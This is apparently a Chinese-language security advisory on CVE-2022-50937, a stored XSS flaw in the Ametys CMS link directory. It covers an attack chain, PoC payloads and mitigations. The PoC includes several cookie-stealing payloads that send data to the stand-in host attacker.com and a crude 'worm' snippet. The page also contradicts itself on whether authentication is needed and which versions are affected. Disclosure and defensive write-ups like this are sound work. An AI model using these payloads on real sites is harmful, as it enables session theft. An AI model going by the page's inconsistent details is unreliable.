CVE-2022-50937 Ametys CMS 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2022-50937

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Ametys CMS v4.4.1

漏洞概述

CVE-2022-50937是Ametys CMS v4.4.1版本中存在的一个存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞位于链接目录（link directory）的外部链接输入字段中，攻击者可以通过在链接文本和描述字段中注入恶意脚本代码来触发持久性攻击。由于恶意代码被存储在服务器端，所有访问包含该恶意内容的页面的用户都会受到攻击，导致用户会话被劫持、应用模块被恶意操纵等严重后果。该漏洞无需认证即可利用，但需要用户交互才能触发，因此CVSS评分定为6.1（中危）。攻击者利用此漏洞可以窃取受害者的Cookie、会话令牌，修改页面内容，甚至进一步进行横向移动攻击。Ametys CMS是一款开源的企业级内容管理系统，广泛应用于政府和企业网站，因此该漏洞可能影响大量终端用户。

技术细节

该漏洞属于存储型XSS（Persistent XSS），攻击流程如下：攻击者首先访问Ametys CMS的链接目录管理功能，在创建或编辑外部链接时，将恶意JavaScript代码注入到链接文本（如链接标题）或描述字段中。由于应用程序未对用户输入进行充分的输入验证和输出编码，恶意代码被直接存储到数据库中。当其他用户访问包含该链接的页面时，服务器从数据库中读取包含恶意代码的内容并直接嵌入到HTML响应中，浏览器将其作为合法脚本执行。攻击者可利用此漏洞执行任意JavaScript代码，包括窃取用户Cookie、劫持会话、修改页面内容、植入钓鱼页面或下载恶意软件。由于链接目录通常在多个页面中展示，影响范围较广。漏洞根源在于应用程序在处理用户提交的数据时缺少适当的HTML实体编码和内容安全策略（CSP）限制。

攻击链分析

STEP 1

步骤1

攻击者访问Ametys CMS管理后台或具有链接编辑权限的用户界面

STEP 2

步骤2

攻击者导航到链接目录（Link Directory）功能模块

STEP 3

步骤3

创建新链接或编辑现有链接，在链接文本或描述字段中注入恶意JavaScript代码

STEP 4

步骤4

由于应用程序未进行输入验证，恶意代码被存储到数据库中

STEP 5

步骤5

普通用户访问包含该恶意链接的页面，服务器将未经过滤的内容返回给用户浏览器

STEP 6

步骤6

用户浏览器执行恶意脚本代码，攻击者成功窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2022-50937 PoC: Stored XSS in Ametys CMS Link Directory -->
<!-- Target: Ametys CMS v4.4.1 Link Directory External Links Input Fields -->

<!-- Step 1: Inject malicious script in link text field -->
<script>
  // Malicious payload to steal session cookies
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie))
</script>

<!-- Alternative payload using img onerror -->
<img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))">

<!-- Step 2: XSS payload in description field -->
<svg/onload=fetch('https://attacker.com/cookie?c='+document.cookie)>

<!-- Step 3: Self-propagating XSS worm payload -->
<script>
  var payload = '<script>fetch("https://attacker.com/exfil?c="+document.cookie)<\/script>';
  // Automatically inject into other links
  document.querySelectorAll('.link-title, .link-description').forEach(function(el) {
    if(el.innerHTML.indexOf('CVE-2022-50937') > -1) {
      el.innerHTML += payload;
    }
  });
</script>

影响范围

Ametys CMS < 4.4.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）禁用或限制链接目录功能的访问权限，仅允许受信任的管理员使用；2）在Web服务器层面配置XSS过滤规则，对请求参数中的<script>、<img>、<svg>等标签进行过滤；3）实施严格的输入验证，限制允许输入的字符类型和长度；4）部署WAF设备并启用XSS防护规则；5）监控日志中的异常请求模式；6）考虑临时关闭外部链接功能，待漏洞修复后再重新启用。建议尽快关注Ametys官方安全公告，获取最新补丁信息并完成升级。